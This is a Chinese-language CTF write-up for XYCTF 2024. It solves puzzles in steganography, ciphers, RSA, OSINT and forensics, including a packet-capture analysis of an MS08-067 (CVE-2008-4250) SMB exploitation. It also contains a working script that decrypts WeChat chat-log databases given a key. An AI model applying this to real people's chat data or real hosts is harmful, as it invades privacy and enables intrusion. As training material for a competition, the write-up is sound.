2024XYCTF-WP

MISC

game

谷歌搜图

发现这个

https://steamcommunity.com/sharedfiles/filedetails/?l=hungarian&id=601631716

然后点击

image-20240401101246326

image-20240401101306545

XYCTF{Papers, Please}

image-20240401103959753

我的二维码为啥扫不出来?

怎么回事,我的二维码好像出了什么问题,你可以帮我修复一下吗

new

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from PIL import Image
import random


def reverse_color(x):
return 0 if x == 255 else 255


def reverse_row_colors(pixels, row, width, block_size=10):
for x_block in range(width // block_size):
x = x_block * block_size
y = row * block_size
for x_small in range(x, x + block_size):
for y_small in range(y, y + block_size):
pixel = pixels[x_small, y_small]
pixels[x_small, y_small] = reverse_color(pixel)


def reverse_col_colors(pixels, col, height, block_size=10):
for y_block in range(height // block_size):
x = col * block_size
y = y_block * block_size
for x_small in range(x, x + block_size):
for y_small in range(y, y + block_size):
pixel = pixels[x_small, y_small]
pixels[x_small, y_small] = reverse_color(pixel)


original_img = Image.open("flag.png")

new_img = original_img.copy()

width, height = new_img.size
pixels = new_img.load()

count = 0

while count < 7:
x = random.randint(0, 1)
if x == 0:
reverse_col_colors(pixels, random.randint(0, height // 10 - 1), height)
else:
reverse_row_colors(pixels, random.randint(0, width // 10 - 1), width)
count += 1

new_img.save("new.png")

分析脚本发现是七次随机对某一行或者某一列的黑白色进行反转

观察二维码可以先修复其的4个小角落

1
2
3
4
reverse_col_colors(pixels, 0, height)
reverse_row_colors(pixels, 1, width)
reverse_col_colors(pixels, 2, height)
reverse_col_colors(pixels, 5, height)

还有3处混淆实际上可以直接爆破得到(混淆处太少了,应该多点的) 应该是根据时序部分总是黑白相间确定

image-20240504232804036

1
2
3
4
5
6
7
8
9
10
11
12
original_img = Image.open("new.png")
new_img = original_img.copy()
width, height = new_img.size
pixels = new_img.load()
reverse_col_colors(pixels, 0, height)
reverse_col_colors(pixels, 2, height)
reverse_col_colors(pixels, 5, height)
reverse_col_colors(pixels, 10, height)
reverse_col_colors(pixels, 11, height)
reverse_row_colors(pixels, 1, width)
reverse_row_colors(pixels, 12, width)
new_img.save("flag.png")

flag{qR_c0d3_1s_s0_fun}

zzl的护理小课堂

网安学累了吧,zzl说给大家出点护理题放松放松

image-20240402122951568

答题100分没有用

看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
document.getElementById('quizForm').addEventListener('submit', function(event) {
event.preventDefault();

var formData = new FormData(this);

var xhr = new XMLHttpRequest();
xhr.open('POST', 'getScore.php', true);
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && xhr.status === 200) {
var score = xhr.responseText;
if (score == 100) {
document.getElementById('scoreDisplay').innerText = "你的分数是: " + score + "/100 杂鱼,怎么才100分啊";
} else if (score < 100) {
document.getElementById('scoreDisplay').innerText = "你的分数是: " + score + "/100 noooooob!!";
} else {
var flagXhr = new XMLHttpRequest();
flagXhr.open('GET', 'flag.php', true);
flagXhr.onreadystatechange = function() {
if (flagXhr.readyState === 4 && flagXhr.status === 200) {
var flag = flagXhr.responseText;
document.getElementById('scoreDisplay').innerText = "Flag: " + flag;
}
};
flagXhr.send(); // 发送请求获取 flag
}
}
};
xhr.send(formData); // 发送请求获取分数
});

访问一下flag.php

image-20240424001116812

必须得由生成的对象XMLhttp对象相当于一个内部类来读取访问,找到源码里面的输出内容,修改document部分为alert前端输出即可,复制下面代码进控制台

1
2
3
4
5
6
7
8
9
var flagXhr = new XMLHttpRequest(); 
flagXhr.open('GET', 'flag.php', true);
flagXhr.onreadystatechange = function() {
if (flagXhr.readyState === 4 && flagXhr.status === 200) {
var flag = flagXhr.responseText;
document.getElementById('scoreDisplay').innerText = "Flag: " + flag;
}
};
flagXhr.send();

image-20240424001234534

XYCTF{Zz1_73IL_YoU_86ed16d55aeb}

ez_隐写

ez 隐写,so 没有提示

image-20240401113025986

是个伪加密

修复一下

发现hint.png有问题

image-20240401113100349

然后binwalk压缩包一下分离出来

还是不能打开

image-20240401113304924

5120X2880_2_3_8

密码为20240401

解压后得到

WATERMARK

image-20240401112420543

1

XYCTF{159-WSX-IJN-852}

image-20240401112639269

熊博士

熊大熊二在森林里玩耍的时候捡到了一张小纸条,可能事关森林的安危,但是上面的字他们看不懂,你能帮他们看看这些神秘的字符是什么意思吗?

1
2
#小纸条.txt
CBXGU{ORF_BV_NVR_BLF_CRZL_QQ}

想到题目名为熊博士,联想到熊菲特博士的埃特巴什码

image-20240401113802810

XYCTF{liu_ye_mei_you_xiao_jj}

ZIP神之套

1
2
ZIP神之套>这玩意咋打不开呢.exe
xyctf????????ftcyx

一开始想到掩码攻击而且回文,但发现不行

后面想到8位数字,之前的题目也有hint,为xyctf开赛日期

密码为xyctf20240401ftcyx

解压后得到flag.zip和套.zip

image-20240405144752423

可以想到明文攻击

用arch

image-20240405144850115

解压后得到flag.md

image-20240405144923738

XYCTF{1A4B8-C9D2F3E-6A4B8C-9D2F3E7F}

出题有点烦

出题好难啊,就瞎出一道吧

image-20240504190545039

解压缩发现里边有五张图片

第五张图片,使用010查看发现最底下有个zip,提取出来发现有密码,再次选择暴力破解

image-20240504190934092

真的flag:XYCTF{981e5_f3ca30_c841487_830f84_fb433e}

真>签到

image-20240430224117777

XYCTF{59bd0e77d13c_1406b23219e_f91cf3a_153e8ea4_77508ba}

彩蛋?

这个平台有些地方藏了东西,你可以找到它吗?

flag不止两段

https://www.xyctf.top/posts/c4584857

image-20240401114337156

1
130131103124106173164150151163137141137

这个是八进制

image-20240401114344886

XYCTF{this_a_

尾部:

image-20240424001745872

1
1100110 1101001 1101110 1100100 1011111 1101001 1110100 1111101
1
2进制转字符:		find_it}

但是好像有三段?

把海报下载下来

发现是个riff

https://convertio.co/zh/png-converter/

转成png

1

image-20240424002949805

1
What keyboard : xn0jtxgoy.p{urp{lbi{abe{c{ydcbt{frb{jab{

有东西发现,keyboard键盘解密,德沃夏克键盘Dvorak解码。

网上搜:qwerty to dvorak convert

http://wbic16.xedoloh.com/dvorak.html

bl0ckbuster_for_png_and_i_think_yon_can_

XYCTF{this_a_bl0ckbuster_for_png_and_i_think_yon_can_find_it}

baby_AIO

这么简单的题目一定难不到你吧₍ᐢ..ᐢ₎♡

难度:mid

TCPL

运行就有flag,都坤吧是兄弟怎么会骗你呢。 格式 FLAG{}

网络追踪

名为JFTQ的黑客使用某种不为人知的手段渗透进了一个不太安全的系统里 聪明的ctfer 你知道他是怎么做到的吗

追踪最后一个tcp流

image-20240424100124302

这个是xxencode

image-20240424100440176

1
2
3
XYCTF{fake_flag}
真正的flag格式:XYCTF{靶机ip地址_nmap扫描出的靶机开放的端口(由大到小排列 中间用_进行连接)_获取靶机shell使用的漏洞的CVE编号}
例:XYCTF{1.1.1.1_888_88_8_CVE-2009-3103}

image-20240424125941484

image-20240424130013147

https://blog.csdn.net/qq_58784379/article/details/120077204

1
XYCTF{192.168.204.133_445_139_135_CVE-2008-4250}

第一个问题 靶机的ip地址

先看流量包的头部 这部分就是扫描ip的部分 Tell后面的ip显然是攻击机的ip 192.168.204.131

image-20240504191359075

在直接看到后面 有两个ip一直在进行会话 一个是攻击机 另一个 192.168.204.133 就是靶机ip了 192.168.204.133

第二个问题 nmap扫描出的靶机开放的端口

这也是个很常见的问题了 考察的就是tcp协议的三次握手

TCP协议的三次握手
第一次:发送 SYN 包
第二次:服务器收到SYN包 同时自己也发一个SYN包 即 SYN+ACK 包 此时服务器进入SYN_RECV状态
第三次:客户端收到服务器的包 向服务器发送确认包 ACK 完成三次握手

因此我们可以得知:SYN标志表示建立连接 ACK表示响应 查看开放端口 肯定会返回ACK标志 找端口即为找ACK标志

第一种方法 我们直接在wireshark里面进行筛选

1
ip.src == 192.168.204.133 && tcp.flags.syn == 1 && tcp.flags.ack == 1

image-20240504191605684

看到一共开放3个端口 445 139 135

第二种方法 使用tcpdump进行筛选

1
tcpdump -n -r 1.pcapng 'ip src 192.168.204.133 and tcp[13] =18' | awk '{print $3}' | sort -u

image-20240504191645391

第三个问题 获取靶机shell使用的漏洞的CVE编号

接上文我们提到的 在流量包最后一个tcp流中看到 拿到shell之后执行的命令 可以看到这是第9438个包 第4147个流

那上一个流4146就是对靶机进行攻击拿shell的流

方法比较多样 可以先判断靶机的操作系统类型 这里我们可以通过smb协议来判断 找到最近的第 9364个包 是关于 Session Setup AndX Response 的信息 当Native OS字段的值为 Windows 5.1 和Native LAN Manager字段的值为 Windows 2000 LAN Manager 时 可以判断操作系统为 Windows XP系统

image-20240504191743501

在看到上一个流也就是第4146个流中的攻击行为存在大量的连接尝试到端口445并且可在连接上发送相同的恶意RPC数据包。

结合windows XP系统和在攻击行为中大量对445端口的连接 我们可以判断这是windows XP系统中最常见的漏洞 ms08_067

搜一下这个漏洞的CVE号 为 CVE-2008-4250

疯狂大杂烩!九转功成

你能突破九大关卡修成神仙吗?

压缩包密码为比赛名称+8位什么来着?忘了。哈哈哈!

flag格式:XYCTF{md5(flag)}

第三层非夏多,看看交点

第六层键盘画图,狼蛛键盘最新版你值得拥有!

密码为XYCTF20240401

解压得到

1
2
3
故事背景.txt

在远古时期,修仙过程被分为:炼气、筑基、结丹、元婴、化神、炼虚、合体、大乘、渡劫等九大层次。有多少心怀抱负的年轻一脉想要登临那巅峰的神仙境地。但对于普通人来说无疑炼气是他们拥有资格的前提。唯有一步一步跨过艰难险阻终会飞升成仙。若你想拿到属于你的那份flag,那就从炼气开始慢慢突破吧!!年轻人不是老夫瞧不起你!你可要想清楚是否要登临那虚无缥缈的神仙境地。

第一层:炼气

首先解压炼气

1
2
3
4
hint1.txt

这是什么东西?
曰:玉魔命灵天观罗炁观神冥西道地真象茫华茫空吉清荡罗命色玉凶北莽人鬼乐量西北灵色净魂地魂莽玉凶阿人梵莽西量魄周界
1
天书(曰)解码:		First_layer_simple

得到压缩包密码

解压阿豆.zip

image-20240424131521187

发现脚底好像有点东西

修复宽高

阿豆_4836

得到flag

1
XYCTF{T3e_c0mb1nation_

第二层:筑基

1
2
3
hint2.txt

xihak-minoh-zusok-humak-zurok-gulyk-somul-nenel-dalek-nusyh-zumek-sysuk-zelil-fepak-tysok-senax
1
BubbleBabble解码:		The_second_layer_is_also_simple

解压hahaha.zip

得到

image-20240424132158870

image-20240424132359211

1
flag2:0f_crypt0_and_

第三层:结丹

hint3

一开始我以为是夏多密码(又称曲折密码)

2643789-20220412220443963-590276514

解码得到

1
ukijhgminhgvtjwkxbhjihdigcjuhkyii

然后发现密码不对

然后联想到之前有道考公题是交点

还有提示,分明写了看交点,我人啥了

根据图片我们可以分成三类:直线,三线,直角

分别对应摩斯密码的 . -空格

1
- .... . ..--.- - .... .. .-. -..
1
2
THE_THIRD
the_third

解压第三层.zip得到两个东西,flag.txt没有东西,flag.zip是一个加密的压缩包,在16进制中给出了一串内容

image-20240424133702496

image-20240424133732703

解压得到flag.txt

1
MZWGCZZT566JU3LJONRV6MLTL5ZGKNTMNR4V6ZTVNYQSC===

image-20240424133817140

1
flag3:misc_1s_re6lly_fun!!

第四层:元婴

1
2
3
hint.txt

都2024年了不会还有人解不出U2FsdGVkX1+y2rlJZlJCMnvyDwHwzkgHvNsG2TF6sFlBlxBs0w4EmyXdDe6s7viL吧

base64解出来带盐,怀疑是aes

密钥为2024

https://www.metools.info/code/c27.html

image-20240424224413940

1
The_fourth_floor_is_okay

解压第四层.zip

1
2
3
hint.txt

wqk:1m813onn17o040358p772q37rm137qpnqppqpn38nr704m56n2m9q22po7r05r77
1
2
3
凯撒Caesar解码:

mode1 #12: key:1a813cbb17c040358d772e37fa137edbeddedb38bf704a56b2a9e22dc7f05f77

MSG0.db判断是数据库文件,但是打不开,百度发现是微信聊天记录文件,是加密的,需要进行解密,前面拿到了一个key,使用脚本进行解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
input_pass = '1a813cbb17c040358d772e37fa137edbeddedb38bf704a56b2a9e22dc7f05f77'
input_dir = r'D:\UserData\Desktop\XYCTF\MISC\疯狂大杂烩!九转功成\修仙传\元婴\第四层\第四层'
import ctypes
import hashlib
import hmac
from pathlib import Path
from Crypto.Cipher import AES
SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
password = bytes.fromhex(input_pass.replace(' ', ''))
def decode_one(input_file):
input_file = Path(input_file)
with open(input_file, 'rb') as (f):
blist = f.read()
print(len(blist))
salt = blist[:16]
key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([x ^ 58 for x in salt])
mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod='sha1')
hash_mac.update(first[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))
if hash_mac.digest() == first[-32:-12]:
print('Decryption Success')
else:
print('Password Error')
blist = [
blist[i:i + DEFAULT_PAGESIZE]
for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)
]
with open(input_file.parent / f'decoded_{input_file.name}', 'wb') as (f):
f.write(SQLITE_FILE_HEADER)
t = AES.new(key, AES.MODE_CBC, first[-48:-32])
f.write(t.decrypt(first[:-48]))
f.write(first[-48:])
for i in blist:
t = AES.new(key, AES.MODE_CBC, i[-48:-32])
f.write(t.decrypt(i[:-48]))
f.write(i[-48:])
if __name__ == '__main__':
input_dir = Path(input_dir)
for f in input_dir.glob('*.db'):
decode_one(f)

放到Navicat中进行查看

image-20240424231548146

1
flag4:L1u_and_K1cky_Mu

第五层:化神

1
2
3
4
hint.txt

enc = 'key{liu*****'
md5 = '87145027d8664fca1413e6a24ae2fbe7'

可以猜出我们是要根据md5去得到明文,可以爆破,猜测最后一个*为},之后我们进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
import hashlib
enc = 'key{liu'
md5 = '87145027d8664fca1413e6a24ae2fbe7'

for x in range(0,127):
for y in range(0,127):
for z in range(0,127):
for k in range(0,127):
temp1 = hashlib.md5(str(enc + chr(x) + chr(y) + chr(z) + chr(k) + "}").encode("utf-8"))
temp2 = temp1.hexdigest()
if(md5 == temp2):
print(enc + chr(x) + chr(y) + chr(z) + chr(k) + "}")
#key{liuyyds}

解压得到 flag.txt 和 serpent.txt

flag.txt无结果。看另一个txt文件名发现是serpent隐写 密码就是 liuyyds

http://serpent.online-domain-tools.com/

image-20240430214233679

image-20240430214334959

https://www.mzy0.com/ctftools/zerowidth1/

image-20240430214549127

_3re_so_sm4rt!

第六层:炼虚

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
hint6.txt

wszrdc
fgtrfvb
ghytgbn
rfctg
yhju
frtg
uyhbghj
6yhn
uyhjujmn
tgvvghb
yhnmghj
4rfv
derf
iujkikmn

键盘密码画图,根据每行字母走向刻画出密码为:keeponfighting

解压得到

image-20240430214832619

都是假的flag,不过有一张yuanshen.jpg

1
2
3
steghide extract -sf yuanshen.jpg
Enter passphrase: 98641
wrote extracted data to "flag.txt".

In_just_a_few_m1nutes_

第七层:合体

1
2
3
4
5
hint7.txt

密文:Tig+AF8-viakubq+AF8-vphrz+AF8-xi+AF8-uayzdyrjs

听说维吉尼亚key大残

首先对密文进行 UTF-7 解码。熟悉此类编码的都懂(直接就看出来了。)

1
Tig_viakubq_vphrz_xi_uayzdyrjs

接下来的操作就挺新颖的。我们知道维吉尼亚 key 都是字母。因此大残即全选。之前做过 BUU 的 NewStar 的应该有印象,当时好像有个 misc 题是 R 通道大残。

image-20240430215401481

压缩包密码:The_seventh_level_is_difficult

解压得到

flag

接下来根据颜色找对应数字。

164 150 145 171 137 167 145 162 145 137 164 150 162 60 165 147 150 41

观察数字发现是八进制。随波逐流八进制转字符得到 flag:

they_were_thr0ugh!

第八层:大乘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# hint8.py

from Crypto.Util.number import bytes_to_long, getPrime
flag=b"password{xxxxx}"
p,q= getPrime(1024),getPrime(1024)
n = p * q
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print("n=",n)
print("c=",c)
print("p^q=",p^q)
'''
n= 22424440693845876425615937206198156323192795003070970628372481545586519202571910046980039629473774728476050491743579624370862986329470409383215065075468386728605063051384392059021805296376762048386684738577913496611584935475550170449080780985441748228151762285167935803792462411864086270975057853459586240221348062704390114311522517740143545536818552136953678289681001385078524272694492488102171313792451138757064749512439313085491407348218882642272660890999334401392575446781843989380319126813905093532399127420355004498205266928383926087604741654126388033455359539622294050073378816939934733818043482668348065680837
c= 1400352566791488780854702404852039753325619504473339742914805493533574607301173055448281490457563376553281260278100479121782031070315232001332230779334468566201536035181472803067591454149095220119515161298278124497692743905005479573688449824603383089039072209462765482969641079166139699160100136497464058040846052349544891194379290091798130028083276644655547583102199460785652743545251337786190066747533476942276409135056971294148569617631848420232571946187374514662386697268226357583074917784091311138900598559834589862248068547368710833454912188762107418000225680256109921244000920682515199518256094121217521229357
p^q= 14488395911544314494659792279988617621083872597458677678553917360723653686158125387612368501147137292689124338045780574752580504090309537035378931155582239359121394194060934595413606438219407712650089234943575201545638736710994468670843068909623985863559465903999731253771522724352015712347585155359405585892

'''

普通的剪枝算法,exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from Crypto.Util.number import *
import gmpy2
import sys # 导入sys模块
sys.setrecursionlimit(3000) # 将默认的递归深度修改为3000

n = 22424440693845876425615937206198156323192795003070970628372481545586519202571910046980039629473774728476050491743579624370862986329470409383215065075468386728605063051384392059021805296376762048386684738577913496611584935475550170449080780985441748228151762285167935803792462411864086270975057853459586240221348062704390114311522517740143545536818552136953678289681001385078524272694492488102171313792451138757064749512439313085491407348218882642272660890999334401392575446781843989380319126813905093532399127420355004498205266928383926087604741654126388033455359539622294050073378816939934733818043482668348065680837
seed = 14488395911544314494659792279988617621083872597458677678553917360723653686158125387612368501147137292689124338045780574752580504090309537035378931155582239359121394194060934595413606438219407712650089234943575201545638736710994468670843068909623985863559465903999731253771522724352015712347585155359405585892
#seed即p^q

def findp(p, rp):
l = len(p)
if l == 1024:
rp.append(int(p, 2))
else:
pp = int(p, 2)
qq = (seed ^ pp) % 2 ** l
if pp * qq % 2 ** l == n % 2 ** l:
findp('1' + p, rp)
findp('0' + p, rp)

rp = []
findp('1', rp)
for i in rp:
if n%i==0 & isPrime(int(i)):
print(i)
#145805499551351837545170670839798336872366414383311042018386386595288060139791135454980413014693924866953972662266748526407954492877610429602886244372924035960962307198910659475639333945895922717307291255423855616274924584270570126180050363106535962473049107576556315461013755859097114552522187755171423621071
#153796947048270429510444756458855481287460639468563001213489907625132438953570738468181770925091867439727519074685449940618659583114338501872698220745473531199063071421852521618805765627999106188015431567625318850899895052130157037822960945909520973243793507740817436707504505709194025074527084803054107605547


p=145805499551351837545170670839798336872366414383311042018386386595288060139791135454980413014693924866953972662266748526407954492877610429602886244372924035960962307198910659475639333945895922717307291255423855616274924584270570126180050363106535962473049107576556315461013755859097114552522187755171423621071
q=n//p
c=1400352566791488780854702404852039753325619504473339742914805493533574607301173055448281490457563376553281260278100479121782031070315232001332230779334468566201536035181472803067591454149095220119515161298278124497692743905005479573688449824603383089039072209462765482969641079166139699160100136497464058040846052349544891194379290091798130028083276644655547583102199460785652743545251337786190066747533476942276409135056971294148569617631848420232571946187374514662386697268226357583074917784091311138900598559834589862248068547368710833454912188762107418000225680256109921244000920682515199518256094121217521229357
e=65537
phi = (p-1) * (q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#password{pruning_algorithm}

解压得到 txt 文本,里面是 no 和 yes 组成的。想到 01 画图。no 代表 0,yes 代表 1

但要知道坐标才行,010 分析压缩包文件尾:

image-20240430215926211

1
5rOi6YCQ5rWB5rSq5rWB5rOi5rOi5rSq5rWB5rOi6ZqP5rSq5rWB6YCQ6ZqP5rWq5rWB5rOi5rOi5rWB5rSq5rWB5rOi5rWB5rSq5rWB6ZqP6YCQ5rSq6YCQ6ZqP6ZqP5rWq5rOi6YCQ5rOi6YCQ5rWq5rOi6YCQ5rWB6ZqP5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi6YCQ5rOi5rWB5rSL5rOi6YCQ6YCQ6ZqP6ZqP5rWB5rWB6ZqP5rSL5rOi5rOi5rWB5rWB6ZqP6ZqP5rWB5rWB5rSL5rOi6ZqP5rWB5rWB6YCQ6ZqP6YCQ5rWB5rSL5rOi5rOi6YCQ5rOi6YCQ6ZqP6ZqP6YCQ5rSL5rWB5rWB5rWB5rWB6ZqP5rOi6YCQ6YCQ5rWq5rOi6ZqP6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rSq5rWB6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi5rOi5rWB5rWB5rWq5rOi6YCQ6ZqP5rOi5rSq5rWB6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi5rOi5rWB5rWB5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi5rOi5rWB5rWB5rWq5rOi6YCQ6ZqP5rOi5rWq5rOi6YCQ6ZqP5rOiCg==

base64

1
波逐流洪流波波洪流波随洪流逐随浪流波波流洪流波流洪流随逐洪逐随随浪波逐波逐浪波逐流随浪波逐随波浪波逐波流洋波逐逐随随流流随洋波波流流随随流流洋波随流流逐随逐流洋波波逐波逐随随逐洋流流流流随波逐逐浪波随随波浪波逐随波洪流随波浪波逐随波浪波逐随波浪波波流流浪波逐随波洪流随波浪波逐随波浪波波流流浪波逐随波浪波逐随波浪波逐随波浪波波流流浪波逐随波浪波逐随波

随言随语

1
548×72 flag格式例如:Aa1aa_a1a_aaa_aa

坐标和 flag 格式都有了,接下来进行画图:

str填入01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from PIL import Image
MAX1 = 548
MAX2=72
pic = Image.new("RGB",(MAX1, MAX2))
str = ""
i = 0
for y in range (0,MAX2):
for x in range (0,MAX1):
if(str[i] == '1'):
pic.putpixel([x,y],(0, 0, 0))
else:
pic.putpixel([x,y],(255,255,255))
i = i+1
pic.show()
pic.save("flag.png")

flag

这是什么?好像是一种文字编码。百度一下发现是须弥沙漠文。

https://mbd.baidu.com/newspage/data/dtlandingsuper?nid=dt_4594772936259849248

f3d3572c11dfa9ec1a832c5c7e04d90e908fc129

对照并根据 flag 格式可以得到:Sm3rt_y0u_can_do

第九层:渡劫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# hint9.py

from Crypto.Util.number import *
from random import randint

p = getPrime(512)
q = getPrime(512)
n = p * q
e = 65537

list = []
for _ in range(2):
a, b = randint(0, 2**8), randint(0, 2**256)
list.append(a * p + b * q)

password = b"xxxxx"
c = pow(bytes_to_long(password), e, n)
print(f'{n = }')
print(f'{c = }')
print(f'{list = }')


#n = 107803636687595025440095910573280948384697923215825513033516157995095253288310988256293799364485832711216571624134612864784507225218094554935994320702026646158448403364145094359869184307003058983513345331145072159626461394056174457238947423145341933245269070758238088257304595154590196901297344034819899810707
#c = 46049806990305232971805282370284531486321903483742293808967054648259532257631501152897799977808185874856877556594402112019213760718833619399554484154753952558768344177069029855164888168964855258336393700323750075374097545884636097653040887100646089615759824303775925046536172147174890161732423364823557122495
#list = [618066045261118017236724048165995810304806699407382457834629201971935031874166645665428046346008581253113148818423751222038794950891638828062215121477677796219952174556774639587782398862778383552199558783726207179240239699423569318, 837886528803727830369459274997823880355524566513794765789322773791217165398250857696201246137309238047085760918029291423500746473773732826702098327609006678602561582473375349618889789179195207461163372699768855398243724052333950197]

爆破 a 求 q (使用笛卡尔积)

我们知道

h1 = a1p + b1q

h2 = a2p + b2q

而其中的 a1 和 a2 很小,所以爆破一下可求

a2h1 – a1h2 = (a2b1 – a1b2) q

发现是 q 的倍数,然后和 n 进行 gcd 即可。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from Crypto.Util.number import *
from itertools import product
from math import gcd
import gmpy2

n = 107803636687595025440095910573280948384697923215825513033516157995095253288310988256293799364485832711216571624134612864784507225218094554935994320702026646158448403364145094359869184307003058983513345331145072159626461394056174457238947423145341933245269070758238088257304595154590196901297344034819899810707
c = 46049806990305232971805282370284531486321903483742293808967054648259532257631501152897799977808185874856877556594402112019213760718833619399554484154753952558768344177069029855164888168964855258336393700323750075374097545884636097653040887100646089615759824303775925046536172147174890161732423364823557122495
list = [618066045261118017236724048165995810304806699407382457834629201971935031874166645665428046346008581253113148818423751222038794950891638828062215121477677796219952174556774639587782398862778383552199558783726207179240239699423569318, 837886528803727830369459274997823880355524566513794765789322773791217165398250857696201246137309238047085760918029291423500746473773732826702098327609006678602561582473375349618889789179195207461163372699768855398243724052333950197]
h1, h2 = list

for a, b in product(range(2**8), repeat=2):
q = gcd(a * h1 - b * h2, n)
if q != 1 and q < n:
print(q, n)
break
q = 12951283811821084332224320465045864899191924765916891677355364529850728204537369439910942929239876470054661306841056350863576815710640615409980095344446711

p = n // q
e = 65537
d = pow(e, -1, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
#game_over

解压得到

1
2
3
你相信我吗.txt

压缩包里的图片真的有东西吗?不如看向外面

那应该是不让你分析图片,图片可能啥也没有。那就分析压缩包呗!尝试很多方法没什么思路,再看看文件名?我们的小秘密?oursecret? 试一下感觉是这个。密码是 game_over

image-20240430220946945

分离得到 flag.txt:

_nine_turns?}

end

最终把九段 flag 拼接得到:

XYCTF{T3e_c0mb1nation_0f_crypt0_and_misc_1s_re6lly_fun!!L1u_and_K1cky_Mu_3re_so_sm4rt!In_just_a_few_m1nutes_they_were_thr0ugh!Sm3rt_y0u_can_do_nine_turns?}

md5 加密上述结果,最终 flag 为:

XYCTF{b1bdc6cf06a28b97c91c1c12f0d3bc00}

取证缝合怪

解压密码:34791fbc-4d71-4a09-9408-a28907fa5435

检材为一个 VirtualBox 虚拟机。出题人使用的 VirtualBox 版本为 7.0.14。

放进 VirtualBox 里启动一下试试?

这个虚拟机有几个设置被改过,是哪几个呢?

Osint1

某人又在外面玩了,你能抓住他吗?
flag格式:xyctf{xxx省|xxx市|xxx路|xx海}

既然都写了是xx省xx市了,就别想着那边了

优先使用高德地图上的名称!

image-20240504192148870

xyctf{江苏省|南通市|滨海南路|黄海}

Osint2

某可哀小南梁又双叒叕出去玩了,快去抓他!!!!
flag提示:xyctf{列车车次名|xxxx省|xxxx(景区名<字数少于6) }
最终结果格式:xyctf{xxxxxx|xxxxx|xxxxxx}

时机:景点玩完了准备回去

根据日期、站点名称以时间去12306查车次

搜索到去泸州的复兴号高铁正好是3点10分,列车车次是G3293,省 份是河南省,景点名字尝试过龙门石窟发现不正确,直接有名的老君山提交成功。

xyctf{G3293|河南省|老君山}

EZ_Base1024*2

1
מಥൎࢺଳɫअΥٻଯԢڥիɺ୦ࢸЭਘמۊիɎඥࡆڣߣಷܤҾয౽5

https://nerdmosis.com/tools/encode-and-decode-base2048

base2048

1
XYCTF{84ca3a6e-3508-4e34-a5e0-7d0f03084181}

Ez_osint

⼀张爱的告⽩的电⼦信件,没有其他信息只能对其分析

在Stegsolve⼯具中发现了⽹站⽔印:www.hi2future.com

image-20240430231849683

查看所有公开信,可以看到出题⼈之⼀liu发的公开信

https://www.hi2future.com/Mail/showitem/id/673413

但是是假flag(其实 Now you see me,but soon you won’t. 是游戏红警的兵种“幻影坦克“的台词,幻影坦克正是上⾯图⽚的隐写⽅式。

通过⽹址URL中的page字段,⽤时间⼆分,⼤概在4千多⻚找到图中的公开信,评论⾥(已经吵起来了)得到flag

https://www.hi2future.com/Mail/showitem/id/494468?page=1

XYCTF{2fb65b60505cf6a9243661ce79431e7a}

失败的人生

CDM258在失败第227次后成功恶堕,失败的人生,失败的人。

附件已更新 部分关键数据在题目中已经提示 祝你们拥有成功的人生

美妙的歌声

这首歌能深深地打动你吗?

频谱图查看密码

XYCTF_1s_w3ll

image-20240430195835808

题目说深深地打动你,可以联想到deepsound

image-20240430200050847

XYCTF{T0uch_y0ur_he3rt_d55ply!!}

又是个签到

也许你能在QQ群里签上到

1
2
3
asrmorfe.txt

😸🙍👭🙅🙇👔🙊👙👺🙂👌👪😫🙈😰😳🙃🙃🙄🙊🙎👐😱🙆👮👡👚👷😵👫🙇👏🙊👲😶👤🙉👫😰😷👹🙇👨👸👓👏🙋🙋👲🙈👳😲🙎👭👨🙉😰👰👙🙇👑👸👦🙎🙊👹🙊👮👗👩🙁😹🙃👧👡👸🙁😱👤👩👣👷👕🙅👨👙👗🙄👵👐👡👢😫😸👔😳👤👬😵😯👦👱😵👭🙎🙂🙃👓😲👐👶👥😷👰😵😹😷👘👗👪👬👥👬👒👱👰😶👕👳😵😯🙇👺😳👹😱😰👵🙉🙁😽😽
1
2
3
签到.txt

